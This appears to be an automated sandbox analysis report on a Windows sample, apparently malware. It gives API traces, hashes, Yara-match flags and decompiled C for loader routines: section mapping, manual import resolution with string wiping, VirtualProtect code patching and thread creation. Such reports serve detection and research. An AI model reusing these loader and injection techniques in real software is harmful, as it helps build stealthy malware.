Instruction Fuzzy Hash: 3311CE31A00219AFEB00DB94DD09FAAB7BDFB88740F050465ED08EB290DB70ED15CB60

Uniqueness

Uniqueness Score: -1.00%

Function 00401B13, Relevance: 4.5, APIs: 3, Instructions: 23
COMMON

Download Yara Rule

C-Code - Quality: 58%

			E00401B13(void* __ecx) {
				char _v8;
				signed short _t7;

				_v8 = _v8 & 0x00000000;
				_t7 = GetLocaleInfoA(0x400, 0x5a,  &_v8, 4); // executed
				if(_t7 == 0) {
					__imp__GetSystemDefaultUILanguage();
					VerLanguageNameA(_t7 & 0xffff,  &_v8, 4);
				}
				return _v8;
			}

0x00401b17
0x00401b28
0x00401b30
0x00401b32
0x00401b45
0x00401b45
0x00401b4f

APIs

GetLocaleInfoA.KERNELBASE(00000400,0000005A,00000000,00000004,?,?,0040163E,?,?,?,00000000,00000000,?,?,?,00401069), ref: 00401B28
GetSystemDefaultUILanguage.KERNEL32(?,?,0040163E,?,?,?,00000000,00000000,?,?,?,00401069), ref: 00401B32
VerLanguageNameA.KERNEL32(?,00000000,00000004,?,?,0040163E,?,?,?,00000000,00000000,?,?,?,00401069), ref: 00401B45

Memory Dump Source

Source File: 00000001.00000002.448591330.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.448578715.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.448616383.0000000000403000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.448636811.0000000000405000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.448653832.0000000000406000.00000002.00020000.sdmp Download File

Similarity

API ID: Language$DefaultInfoLocaleNameSystem
String ID:
API String ID: 3724080410-0
Opcode ID: cb925b34f63bbb62b220547e8286ad987bcdfd9e5328ee8ffb311e2a433531bc
Instruction ID: 01a5d7fcbf74ede893591b8f70fc931fac323dfd500e352f52dd0dee8aad3c2f
Opcode Fuzzy Hash: cb925b34f63bbb62b220547e8286ad987bcdfd9e5328ee8ffb311e2a433531bc
Instruction Fuzzy Hash: 2DE0BFB4651249B6E710EB91DD06FBA76BCAB0074AF500055FB41F60D0E7B8AF04A769

Uniqueness

Uniqueness Score: -1.00%

Function 02B8AC94, Relevance: 3.0, APIs: 2, Instructions: 35librarynativeloaderCOMMON

Download Yara Rule

APIs

GetProcAddress.KERNEL32(6F57775A,00000000), ref: 02B8ACBD
NtWow64ReadVirtualMemory64.NTDLL(00000100,?,?,00000028,00000000,00000000,00000100,00000000,?,?,?,02B86D3E,00000000,00000000,00000028,00000100), ref: 02B8ACDF

Memory Dump Source

Source File: 00000001.00000002.449546892.0000000002B70000.00000040.00000001.sdmp, Offset: 02B70000, based on PE: false

Yara matches

Similarity

API ID: AddressMemory64ProcReadVirtualWow64
String ID:
API String ID: 752694512-0
Opcode ID: 414dbb9a571bb20156ee7ddb8ce1f7a07762984cb619e7f74f40abcb7b32f26a
Instruction ID: 7005d97c125646bbf8d1e1a4cae100a639723313a8b788d0b301ebf794e6fec3
Opcode Fuzzy Hash: 414dbb9a571bb20156ee7ddb8ce1f7a07762984cb619e7f74f40abcb7b32f26a
Instruction Fuzzy Hash: C3F04971900205BFCB01DF86DC41C5ABBBAFB84380B40485BFA04D3220D330E961DF20

Uniqueness

Uniqueness Score: -1.00%

Function 00401AD1, Relevance: 1.5, APIs: 1, Instructions: 34
nativeCOMMON

Download Yara Rule

C-Code - Quality: 68%

			E00401AD1(void** __esi, PVOID* _a4) {
				long _v8;
				void* _v12;
				void* _v16;
				long _t13;

				_v16 = 0;
				asm("stosd");
				_v8 = 0;
				_t13 = NtMapViewOfSection( *__esi, 0xffffffff, _a4, 0, 0,  &_v16,  &_v8, 2, 0, __esi[2]);
				if(_t13 < 0) {
					_push(_t13);
					return __esi[6]();
				}
				return 0;
			}

0x00401ae3
0x00401ae9
0x00401af7
0x00401afe
0x00401b03
0x00401b09
0x00000000
0x00401b0a
0x00000000

APIs

NtMapViewOfSection.NTDLL(00000000,000000FF,?,00000000,00000000,?,00401C94,00000002,00000000,?,?,00000000,?,?,00401C94,?), ref: 00401AFE

Memory Dump Source

Source File: 00000001.00000002.448591330.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.448578715.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.448616383.0000000000403000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.448636811.0000000000405000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.448653832.0000000000406000.00000002.00020000.sdmp Download File

Similarity

API ID: SectionView
String ID:
API String ID: 1323581903-0
Opcode ID: 5dd26fff624a50198c0bd826f45a2e4ef6e885f587514f0e64cb0fed618db76f
Instruction ID: 9e9d64cac0a8180061c93d2636642020a48d2d09b29684d8e74b642ad5960579
Opcode Fuzzy Hash: 5dd26fff624a50198c0bd826f45a2e4ef6e885f587514f0e64cb0fed618db76f
Instruction Fuzzy Hash: 39F012B590420CBFDB119FA5DC85C9FBBBDEB44355B10493AB152E10A0E630AE189A60

Uniqueness

Uniqueness Score: -1.00%

Function 02B8CD7A, Relevance: 1.5, APIs: 1, Instructions: 33nativeCOMMON

Download Yara Rule

APIs

NtQueryInformationProcess.NTDLL(00000000,?,00000018,00000000,02B9E240), ref: 02B8CD91

Memory Dump Source

Source File: 00000001.00000002.449546892.0000000002B70000.00000040.00000001.sdmp, Offset: 02B70000, based on PE: false

Yara matches

Similarity

API ID: InformationProcessQuery
String ID:
API String ID: 1778838933-0
Opcode ID: be8031f4d47140a7f507c4472c4cad9c91f9ae5df2120e059ebb085571a27f92
Instruction ID: c179abce40d6cde5eeb7647b98bcae64d3095e667e28d4906476f9bb5b17f44a
Opcode Fuzzy Hash: be8031f4d47140a7f507c4472c4cad9c91f9ae5df2120e059ebb085571a27f92
Instruction Fuzzy Hash: AEF05EB57001199FCB24FE65C885DDBBFB9EB057947414596E908DB260E330E905CBF0

Uniqueness

Uniqueness Score: -1.00%

Function 02B7A87A, Relevance: 22.6, APIs: 15, Instructions: 130memorysynchronizationCOMMON

Download Yara Rule

APIs

SleepEx.KERNELBASE(00000064,00000001,00000000,?,?,?,02B925B8), ref: 02B7A8A3
RtlDeleteCriticalSection.NTDLL(02B9E220), ref: 02B7A8D6
RtlDeleteCriticalSection.NTDLL(02B9E240), ref: 02B7A8DD
CloseHandle.KERNEL32(?,?,02B925B8), ref: 02B7A90C
ReleaseMutex.KERNEL32(000002C0,00000000,?,?,?,02B925B8), ref: 02B7A91D
CloseHandle.KERNEL32(?,?,02B925B8), ref: 02B7A929
ResetEvent.KERNEL32(00000000,00000000,?,?,?,02B925B8), ref: 02B7A935
CloseHandle.KERNEL32(?,?,02B925B8), ref: 02B7A941
SleepEx.KERNELBASE(00000064,00000001,00000000,?,?,?,02B925B8), ref: 02B7A947
SleepEx.KERNEL32(00000064,00000001,?,?,02B925B8), ref: 02B7A95B
HeapFree.KERNEL32(00000000,00000000,?,?,02B925B8), ref: 02B7A97E
RtlRemoveVectoredExceptionHandler.NTDLL(02BB05B8), ref: 02B7A9B7
SleepEx.KERNELBASE(00000064,00000001,?,?,02B925B8), ref: 02B7A9D3
FindCloseChangeNotification.KERNELBASE(05AE8548,?,?,02B925B8), ref: 02B7A9FA
LocalFree.KERNEL32(?,?,02B925B8), ref: 02B7AA0A

Part of subcall function 02B863E9: GetVersion.KERNEL32(?,00000000,76D7F720,?,02B7A894,00000000,?,?,?,02B925B8), ref: 02B8640D
Part of subcall function 02B863E9: GetModuleHandleA.KERNEL32(NTDLL.DLL,LdrUnregisterDllNotification,?,02B7A894,00000000,?,?,?,02B925B8), ref: 02B86421
Part of subcall function 02B863E9: GetProcAddress.KERNEL32(00000000), ref: 02B86428

Part of subcall function 02B79882: RtlEnterCriticalSection.NTDLL(02B9E240), ref: 02B7988C
Part of subcall function 02B79882: RtlLeaveCriticalSection.NTDLL(02B9E240), ref: 02B798C8

Memory Dump Source

Source File: 00000001.00000002.449546892.0000000002B70000.00000040.00000001.sdmp, Offset: 02B70000, based on PE: false

Yara matches

Similarity

API ID: CloseCriticalHandleSectionSleep$DeleteFree$AddressChangeEnterEventExceptionFindHandlerHeapLeaveLocalModuleMutexNotificationProcReleaseRemoveResetVectoredVersion
String ID:
API String ID: 3271069005-0
Opcode ID: 5d6a8b071cb0165bf10e77b7f0e2125c6f32365a34d2fc272ab9495efb2de0b4
Instruction ID: 936b081feab950adefa91402dd90400cfd5822be3b48555abb8d5b42fc67fd60
Opcode Fuzzy Hash: 5d6a8b071cb0165bf10e77b7f0e2125c6f32365a34d2fc272ab9495efb2de0b4
Instruction Fuzzy Hash: 53416D32E80205EBDB60EF65EE86A1977A6EB003847150CA6FA25E7190D771DCB4CF61

Uniqueness

Uniqueness Score: -1.00%

Function 02B7EC30, Relevance: 15.1, APIs: 10, Instructions: 117memorystringCOMMON

Download Yara Rule

APIs

lstrlen.KERNEL32(?,?,00000000,?,02B76222,02B9D4E4,?,?,00000004,00000000,?,00000000,02B7B275,?,?), ref: 02B7EC7D
VirtualProtect.KERNEL32(00000000,00000000,00000040,-0000001C,?,00000000,?,02B76222,02B9D4E4,?,?,00000004,00000000,?,00000000,02B7B275), ref: 02B7EC8F
lstrcpy.KERNEL32(00000000,?), ref: 02B7EC9E
VirtualProtect.KERNEL32(00000000,00000000,?,-0000001C,?,00000000,?,02B76222,02B9D4E4,?,?,00000004,00000000,?,00000000,02B7B275), ref: 02B7ECAF
VirtualProtect.KERNELBASE(?,00000005,00000040,-0000001C,02B9A4F8,00000018,02B77458,?,00000000,?,02B76222,02B9D4E4,?,?,00000004,00000000), ref: 02B7ECE5
VirtualProtect.KERNELBASE(?,00000004,?,-0000001C,?,00000000,?,02B76222,02B9D4E4,?,?,00000004,00000000,?,00000000,02B7B275), ref: 02B7ED00
VirtualProtect.KERNEL32(?,00000004,00000040,-0000001C,02B9A4F8,00000018,02B77458,?,00000000,?,02B76222,02B9D4E4,?,?,00000004,00000000), ref: 02B7ED15
VirtualProtect.KERNELBASE(?,00000004,00000040,-0000001C,02B9A4F8,00000018,02B77458,?,00000000,?,02B76222,02B9D4E4,?,?,00000004,00000000), ref: 02B7ED42
VirtualProtect.KERNELBASE(?,00000004,?,-0000001C,?,00000000,?,02B76222,02B9D4E4,?,?,00000004,00000000,?,00000000,02B7B275), ref: 02B7ED5C
GetLastError.KERNEL32(?,00000000,?,02B76222,02B9D4E4,?,?,00000004,00000000,?,00000000,02B7B275,?,?), ref: 02B7ED63

Memory Dump Source

Source File: 00000001.00000002.449546892.0000000002B70000.00000040.00000001.sdmp, Offset: 02B70000, based on PE: false

Yara matches

Similarity

API ID: ProtectVirtual$ErrorLastlstrcpylstrlen
String ID:
API String ID: 3676034644-0
Opcode ID: a1d8ee7a16c191d559f023bbd05398bd4510f1d3b7afa10e1d638cf8154627c1
Instruction ID: aed55a609bfe207576fe057cacffed932b2db746362cee51a2f32d577681699c
Opcode Fuzzy Hash: a1d8ee7a16c191d559f023bbd05398bd4510f1d3b7afa10e1d638cf8154627c1
Instruction Fuzzy Hash: AD414F71940709DFDB21DF64CC44EAAB7B9FF09354F008A99E666A76A0D734E805DF20

Uniqueness

Uniqueness Score: -1.00%

Function 00401DBD, Relevance: 13.6, APIs: 9, Instructions: 81
filetimeCOMMON

Download Yara Rule

C-Code - Quality: 69%

			E00401DBD(intOrPtr __edx, long _a4, void** _a8, void** _a12) {
				intOrPtr _v12;
				struct _FILETIME* _v16;
				short _v60;
				struct _FILETIME* _t14;
				intOrPtr _t15;
				long _t18;
				void* _t19;
				void* _t22;
				intOrPtr _t31;
				long _t32;
				void* _t34;

				_t31 = __edx;
				_t14 =  &_v16;
				GetSystemTimeAsFileTime(_t14);
				_push(0x192);
				_push(0x54d38000);
				_push(_v12);
				_push(_v16);
				L00402150();
				_push(_t14);
				_v16 = _t14;
				_t15 =  *0x404150;
				_push(_t15 + 0x40505e);
				_push(_t15 + 0x405054);
				_push(0x16);
				_push( &_v60);
				_v12 = _t31;
				L0040214A();
				_t18 = _a4;
				if(_t18 == 0) {
					_t18 = 0x1000;
				}
				_t19 = CreateFileMappingW(0xffffffff, 0x404140, 4, 0, _t18,  &_v60); // executed
				_t34 = _t19;
				if(_t34 == 0) {
					_t32 = GetLastError();
				} else {
					if(_a4 != 0 || GetLastError() == 0xb7) {
						_t22 = MapViewOfFile(_t34, 6, 0, 0, 0); // executed
						if(_t22 == 0) {
							_t32 = GetLastError();
							if(_t32 != 0) {
								goto L9;
							}
						} else {
							 *_a8 = _t34;
							 *_a12 = _t22;
							_t32 = 0;
						}
					} else {
						_t32 = 2;
						L9:
						CloseHandle(_t34);
					}
				}
				return _t32;
			}

0x00401dbd
0x00401dc6
0x00401dca
0x00401dd0
0x00401dd5
0x00401dda
0x00401ddd
0x00401de0
0x00401de5
0x00401de6
0x00401de9
0x00401df4
0x00401dfb
0x00401dff
0x00401e01
0x00401e02
0x00401e05
0x00401e0a
0x00401e14
0x00401e16
0x00401e16
0x00401e2a
0x00401e30
0x00401e34
0x00401e84
0x00401e36
0x00401e3f
0x00401e55
0x00401e5d
0x00401e6f
0x00401e73
0x00000000
0x00000000
0x00401e5f
0x00401e62
0x00401e67
0x00401e69
0x00401e69
0x00401e4a
0x00401e4c
0x00401e75
0x00401e76
0x00401e76
0x00401e3f
0x00401e8c

APIs

GetSystemTimeAsFileTime.KERNEL32(?,00000002,?,?,?,?,?,?,?,?,?,?,?,004011EF,0000000A,?), ref: 00401DCA
_aulldiv.NTDLL(?,?,54D38000,00000192), ref: 00401DE0
_snwprintf.NTDLL ref: 00401E05
CreateFileMappingW.KERNELBASE(000000FF,00404140,00000004,00000000,?,?), ref: 00401E2A
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,004011EF,0000000A), ref: 00401E41
MapViewOfFile.KERNELBASE(00000000,00000006,00000000,00000000,00000000), ref: 00401E55
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,004011EF,0000000A), ref: 00401E6D
CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,004011EF), ref: 00401E76
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,004011EF,0000000A), ref: 00401E7E

Memory Dump Source

Source File: 00000001.00000002.448591330.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.448578715.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.448616383.0000000000403000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.448636811.0000000000405000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.448653832.0000000000406000.00000002.00020000.sdmp Download File

Similarity

API ID: ErrorFileLast$Time$CloseCreateHandleMappingSystemView_aulldiv_snwprintf
String ID:
API String ID: 1724014008-0
Opcode ID: e65967ec34e0ef9094c5ae24609a9164c9b18ae7d693088fafc061c06b939a1c
Instruction ID: 82017999e32cfca07d52a25ee9bd1ac56d091574f89d71fd323089f2015f5866
Opcode Fuzzy Hash: e65967ec34e0ef9094c5ae24609a9164c9b18ae7d693088fafc061c06b939a1c
Instruction Fuzzy Hash: 1C21A472500104BFD710AFA8DC88E9F7BADEB48355F104136FA05F72E0D6749941CBA8

Uniqueness

Uniqueness Score: -1.00%

Function 00401792, Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 104
librarystringloaderCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00401792(intOrPtr* _a4, intOrPtr _a8) {
				signed int _v8;
				signed short _v12;
				struct HINSTANCE__* _v16;
				intOrPtr _v20;
				_Unknown_base(*)()* _v24;
				intOrPtr _t34;
				intOrPtr _t36;
				struct HINSTANCE__* _t37;
				intOrPtr _t40;
				CHAR* _t44;
				_Unknown_base(*)()* _t45;
				intOrPtr* _t52;
				intOrPtr _t53;
				signed short _t54;
				intOrPtr* _t57;
				signed short _t59;
				CHAR* _t60;
				CHAR* _t62;
				signed short* _t64;
				void* _t65;
				signed short _t72;

				_t34 =  *((intOrPtr*)(_a8 + 0x80));
				_v8 = _v8 & 0x00000000;
				_t52 = _a4;
				if(_t34 == 0) {
					L28:
					return _v8;
				}
				_t57 = _t34 + _t52;
				_t36 =  *((intOrPtr*)(_t57 + 0xc));
				_a4 = _t57;
				if(_t36 == 0) {
					L27:
					goto L28;
				}
				while(1) {
					_t62 = _t36 + _t52;
					_t37 = LoadLibraryA(_t62); // executed
					_v16 = _t37;
					if(_t37 == 0) {
						break;
					}
					_v12 = _v12 & 0x00000000;
					memset(_t62, 0, lstrlenA(_t62));
					_t53 =  *_t57;
					_t40 =  *((intOrPtr*)(_t57 + 0x10));
					_t65 = _t65 + 0xc;
					if(_t53 != 0) {
						L6:
						_t64 = _t53 + _t52;
						_t54 =  *_t64;
						if(_t54 == 0) {
							L23:
							_t36 =  *((intOrPtr*)(_t57 + 0x20));
							_t57 = _t57 + 0x14;
							_a4 = _t57;
							if(_t36 != 0) {
								continue;
							}
							L26:
							goto L27;
						}
						_v20 = _t40 - _t64 + _t52;
						_t72 = _t54;
						L8:
						L8:
						if(_t72 < 0) {
							if(_t54 < _t52 || _t54 >=  *((intOrPtr*)(_a8 + 0x50)) + _t52) {
								_t59 = 0;
								_v12 =  *_t64 & 0x0000ffff;
							} else {
								_t59 = _t54;
							}
						} else {
							_t59 = _t54 + _t52;
						}
						_t20 = _t59 + 2; // 0x2
						_t44 = _t20;
						if(_t59 == 0) {
							_t44 = _v12 & 0x0000ffff;
						}
						_t45 = GetProcAddress(_v16, _t44);
						_v24 = _t45;
						if(_t45 == 0) {
							goto L21;
						}
						if(_t59 != 0) {
							_t60 = _t59 + 2;
							memset(_t60, 0, lstrlenA(_t60));
							_t65 = _t65 + 0xc;
						}
						 *(_v20 + _t64) = _v24;
						_t64 =  &(_t64[2]);
						_t54 =  *_t64;
						if(_t54 != 0) {
							goto L8;
						} else {
							L22:
							_t57 = _a4;
							goto L23;
						}
						L21:
						_v8 = 0x7f;
						goto L22;
					}
					_t53 = _t40;
					if(_t40 == 0) {
						goto L23;
					}
					goto L6;
				}
				_v8 = 0x7e;
				goto L26;
			}

0x0040179b
0x004017a1
0x004017a8
0x004017ab
0x004018ac
0x004018b1
0x004018b1
0x004017b2
0x004017b5
0x004017ba
0x004017bd
0x004018ab
0x00000000
0x004018ab
0x004017c4
0x004017c4
0x004017c8
0x004017d0
0x004017d3
0x00000000
0x00000000
0x004017d9
0x004017e8
0x004017ed
0x004017ef
0x004017f2
0x004017f7
0x00401803
0x00401803
0x00401806
0x0040180a
0x00401890
0x00401890
0x00401893
0x00401898
0x0040189b
0x00000000
0x00000000
0x004018aa
0x00000000
0x004018aa
0x00401814
0x00401817
0x00000000
0x00401819
0x00401819
0x00401822
0x00401837
0x00401839
0x00401830
0x00401830
0x00401830
0x0040181b
0x0040181b
0x0040181b
0x0040183e
0x0040183e
0x00401841
0x00401843
0x00401843
0x0040184b
0x00401853
0x00401856
0x00000000
0x00000000
0x0040185a
0x0040185c
0x0040186a
0x0040186f
0x0040186f
0x00401878
0x0040187b
0x0040187e
0x00401882
0x00000000
0x00401884
0x0040188d
0x0040188d
0x00000000
0x0040188d
0x00401886
0x00401886
0x00000000
0x00401886
0x004017fb
0x004017fd
0x00000000
0x00000000
0x00000000
0x004017fd
0x004018a3
0x00000000

APIs

LoadLibraryA.KERNELBASE(00000002,00000002,?,00000000,?,?,00000002), ref: 004017C8
lstrlenA.KERNEL32(00000002), ref: 004017DE
memset.NTDLL ref: 004017E8
GetProcAddress.KERNEL32(?,00000002), ref: 0040184B
lstrlenA.KERNEL32(-00000002), ref: 00401860
memset.NTDLL ref: 0040186A

Strings

~, xrefs: 004018A3

Memory Dump Source

Source File: 00000001.00000002.448591330.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.448578715.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.448616383.0000000000403000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.448636811.0000000000405000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.448653832.0000000000406000.00000002.00020000.sdmp Download File

Similarity

API ID: lstrlenmemset$AddressLibraryLoadProc
String ID: ~
API String ID: 1986585659-1707062198
Opcode ID: 0d6d5e82c33b42e5908318737b4093a3aecd2a4003c0cec74c20d9d0518e8701
Instruction ID: d493b599874391c077b3b61154010d5be239e78dc0573bc5c2a20b44158202bc
Opcode Fuzzy Hash: 0d6d5e82c33b42e5908318737b4093a3aecd2a4003c0cec74c20d9d0518e8701
Instruction Fuzzy Hash: B3314F72A01205ABDB14DF59C950BAAB7B8BF44345F24803AEC05FB3A1D738EA01CB58

Uniqueness

Uniqueness Score: -1.00%

Function 02B71000, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 120memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 02B95277: VirtualProtect.KERNELBASE(?,00000000,00000040,00000004,00000000,?,00000000,00000000,?,?,02B7619F,00000004,00000000,?,00000000,02B7B275), ref: 02B9529C
Part of subcall function 02B95277: GetLastError.KERNEL32(?,00000000,00000000,?,?,02B7619F,00000004,00000000,?,00000000,02B7B275,?,?), ref: 02B952A4
Part of subcall function 02B95277: VirtualQuery.KERNEL32(?,00000000,0000001C,?,00000000,00000000,?,?,02B7619F,00000004,00000000,?,00000000,02B7B275,?,?), ref: 02B952BB
Part of subcall function 02B95277: VirtualProtect.KERNEL32(?,00000000,-392CC87E,00000004,?,00000000,00000000,?,?,02B7619F,00000004,00000000,?,00000000,02B7B275,?), ref: 02B952E0

GetLastError.KERNEL32(00000000,00000004,02B9D518,00000000,?,00000000,00000002,02B9A568,0000001C,02B85176,00000002,?,00000001,00000000,02B9D514,00000000), ref: 02B71159

Part of subcall function 02B924E0: lstrlen.KERNEL32(6AD68BFC,02B7619F,?,02B7619F,00000004), ref: 02B92518
Part of subcall function 02B924E0: lstrcpy.KERNEL32(00000000,6AD68BFC), ref: 02B9252F
Part of subcall function 02B924E0: StrChrA.SHLWAPI(00000000,0000002E,?,02B7619F,00000004), ref: 02B92538
Part of subcall function 02B924E0: GetModuleHandleA.KERNEL32(00000000,?,02B7619F,00000004), ref: 02B92556

VirtualProtect.KERNELBASE(00000000,00000005,00000040,00000040,00000000,00000005,?,00000000,6AD68BFC,?,00000004,00000000,00000004,02B9D518,00000000,?), ref: 02B710D7
VirtualProtect.KERNELBASE(00000000,00000004,02B9D518,02B9D518,?,00000004,00000000,00000004,02B9D518,00000000,?,00000000,00000002,02B9A568,0000001C,02B85176), ref: 02B710F2
RtlEnterCriticalSection.NTDLL(02B9E240), ref: 02B71116
RtlLeaveCriticalSection.NTDLL(02B9E240), ref: 02B71134

Part of subcall function 02B95277: SetLastError.KERNEL32(00000000,?,00000000,00000000,?,?,02B7619F,00000004,00000000,?,00000000,02B7B275,?,?), ref: 02B952E9

Strings

, xrefs: 02B710C6

Memory Dump Source

Source File: 00000001.00000002.449546892.0000000002B70000.00000040.00000001.sdmp, Offset: 02B70000, based on PE: false

Yara matches

Similarity

API ID: Virtual$Protect$ErrorLast$CriticalSection$EnterHandleLeaveModuleQuerylstrcpylstrlen
String ID:
API String ID: 899430048-3916222277
Opcode ID: 8cfd7f7851b066cb27b2eb3bd6118dc9d4e72275a82fdae8609cacedef623758
Instruction ID: 81ef51bdaec7b2c010a1a56ce2501ba02ca04c3c21f776fdd8e74080498b3518
Opcode Fuzzy Hash: 8cfd7f7851b066cb27b2eb3bd6118dc9d4e72275a82fdae8609cacedef623758
Instruction Fuzzy Hash: 00415E71900619EFDB11DF69C944A9DBBF9FF08350F04825AE969AB690D730E950CFA0

Uniqueness

Uniqueness Score: -1.00%

Function 02B89D35, Relevance: 10.6, APIs: 7, Instructions: 110memorystringCOMMON

Download Yara Rule

APIs

Part of subcall function 02B86CBC: GetProcAddress.KERNEL32(6F57775A,00000000), ref: 02B86CE1
Part of subcall function 02B86CBC: NtWow64QueryInformationProcess64.NTDLL(00000000,00000000,?,00000030,00000000), ref: 02B86CFD

VirtualAlloc.KERNELBASE(00000000,?,00003000,00000004), ref: 02B89D6E
VirtualFree.KERNELBASE(00000000,00000000,00008000), ref: 02B89E59

Part of subcall function 02B86CBC: StrRChrA.SHLWAPI(00000018,00000000,0000005C,00000000,00000000,?,00000000,00000068,00000098,00000000,00000028,00000040,00000000,00000000,00000028,00000100), ref: 02B86E67

VirtualFree.KERNEL32(00000000,00000000,00008000,00000000,00000000,?,?), ref: 02B89DA4
VirtualAlloc.KERNEL32(00000000,?,00003000,00000004), ref: 02B89DB0
lstrcmpi.KERNEL32(?,00000000), ref: 02B89DED
StrChrA.SHLWAPI(?,0000002E), ref: 02B89DF6
lstrcmpi.KERNEL32(?,00000000), ref: 02B89E08

Memory Dump Source

Source File: 00000001.00000002.449546892.0000000002B70000.00000040.00000001.sdmp, Offset: 02B70000, based on PE: false

Yara matches

Similarity

API ID: Virtual$AllocFreelstrcmpi$AddressInformationProcProcess64QueryWow64
String ID:
API String ID: 3901270786-0
Opcode ID: f8ef3f3e80b20462386ec0f0e3e22f4c01b6df6e0a7f335103fae2ea7f67024c
Instruction ID: 2b432380d87e82ba91ef333e405421cad66e0029725e58db1368dd0a3fd85b94
Opcode Fuzzy Hash: f8ef3f3e80b20462386ec0f0e3e22f4c01b6df6e0a7f335103fae2ea7f67024c
Instruction Fuzzy Hash: A931A272504B15EBD721AF11C940B2BBBE8FF89B45F000A5CF988A7340D774E948CBA6

Uniqueness

Uniqueness Score: -1.00%

Function 02B78554, Relevance: 10.6, APIs: 7, Instructions: 80sleepthreadCOMMON

Download Yara Rule

APIs

Part of subcall function 02B84F76: memset.NTDLL ref: 02B84F80

OpenEventA.KERNEL32(00000002,00000000,02B9E130,?,00000000,00000000,?,02B815E7), ref: 02B785E4
SetEvent.KERNEL32(00000000,?,02B815E7), ref: 02B785F1
Sleep.KERNEL32(00000BB8,?,02B815E7), ref: 02B785FC
ResetEvent.KERNEL32(00000000,?,02B815E7), ref: 02B78603
CloseHandle.KERNEL32(00000000,?,02B815E7), ref: 02B7860A
GetShellWindow.USER32 ref: 02B78615
GetWindowThreadProcessId.USER32(00000000), ref: 02B7861C

Part of subcall function 02B7F792: RegOpenKeyExW.KERNELBASE(80000002,00000000,00000000,00020119,?,006E0049,System,004F0053,00000000), ref: 02B7F7E8
Part of subcall function 02B7F792: RegQueryValueExW.KERNELBASE(?,00000000,00000000,?,00000000,00000004), ref: 02B7F804
Part of subcall function 02B7F792: RegCloseKey.KERNELBASE(?), ref: 02B7F815

Memory Dump Source

Source File: 00000001.00000002.449546892.0000000002B70000.00000040.00000001.sdmp, Offset: 02B70000, based on PE: false

Yara matches

Similarity

API ID: Event$CloseOpenWindow$HandleProcessQueryResetShellSleepThreadValuememset
String ID:
API String ID: 937394351-0
Opcode ID: cad099c2d2477f13c2135ace42e227bc19c9f700192e1d75144ee8fc49a63511
Instruction ID: 3f68e0cf5d1867702a08c293a63486463df57abc0a8596fd37eee3dc4c4bf260
Opcode Fuzzy Hash: cad099c2d2477f13c2135ace42e227bc19c9f700192e1d75144ee8fc49a63511
Instruction Fuzzy Hash: A8219F32940220BBC714BB66AA4CD2B7B6FEB857A0B044C8AF51987141DB34D451DF75

Uniqueness

Uniqueness Score: -1.00%

Function 0040146A, Relevance: 10.6, APIs: 7, Instructions: 74
memorythreadCOMMON

Download Yara Rule

C-Code - Quality: 89%

			_entry_(void* __ecx, intOrPtr _a4, long _a8, intOrPtr _a12) {
				struct _SECURITY_ATTRIBUTES* _v8;
				void* __edi;
				void* __esi;
				void* __ebp;
				long _t9;
				void* _t10;
				void* _t18;
				void* _t23;
				void* _t36;

				_push(__ecx);
				_t9 = _a8;
				_v8 = 1;
				if(_t9 == 0) {
					_t10 = InterlockedDecrement(0x404108);
					__eflags = _t10;
					if(_t10 == 0) {
						__eflags =  *0x40410c;
						if( *0x40410c != 0) {
							_t36 = 0x2710;
							while(1) {
								SleepEx(0x64, 1);
								__eflags =  *0x404118;
								if( *0x404118 == 0) {
									break;
								}
								_t36 = _t36 - 0x64;
								__eflags = _t36;
								if(_t36 > 0) {
									continue;
								}
								break;
							}
							CloseHandle( *0x40410c);
						}
						HeapDestroy( *0x404110);
					}
				} else {
					if(_t9 == 1 && InterlockedIncrement(0x404108) == 1) {
						_t18 = HeapCreate(0, 0x400000, 0); // executed
						_t41 = _t18;
						 *0x404110 = _t18;
						if(_t18 == 0) {
							L6:
							_v8 = 0;
						} else {
							 *0x404130 = _a4;
							asm("lock xadd [eax], ebx");
							_t23 = CreateThread(0, 0, E0040154A, E00401413(_a12, 0, 0x404118, _t41), 0,  &_a8); // executed
							 *0x40410c = _t23;
							if(_t23 == 0) {
								asm("lock xadd [esi], eax");
								goto L6;
							}
						}
					}
				}
				return _v8;
			}

0x0040146d
0x00401479
0x0040147b
0x0040147e
0x004014f8
0x004014fe
0x00401500
0x00401502
0x00401508
0x0040150a
0x0040150f
0x00401512
0x0040151d
0x0040151f
0x00000000
0x00000000
0x00401521
0x00401524
0x00401526
0x00000000
0x00000000
0x00000000
0x00401526
0x0040152e
0x0040152e
0x0040153a
0x0040153a
0x00401480
0x00401481
0x004014a1
0x004014a7
0x004014a9
0x004014ae
0x004014ee
0x004014ee
0x004014b0
0x004014b8
0x004014bf
0x004014d8
0x004014e0
0x004014e5
0x004014ea
0x00000000
0x004014ea
0x004014e5
0x004014ae
0x00401481
0x00401547

APIs

InterlockedIncrement.KERNEL32(00404108), ref: 0040148C
HeapCreate.KERNELBASE(00000000,00400000,00000000), ref: 004014A1
CreateThread.KERNELBASE ref: 004014D8
InterlockedDecrement.KERNEL32(00404108), ref: 004014F8
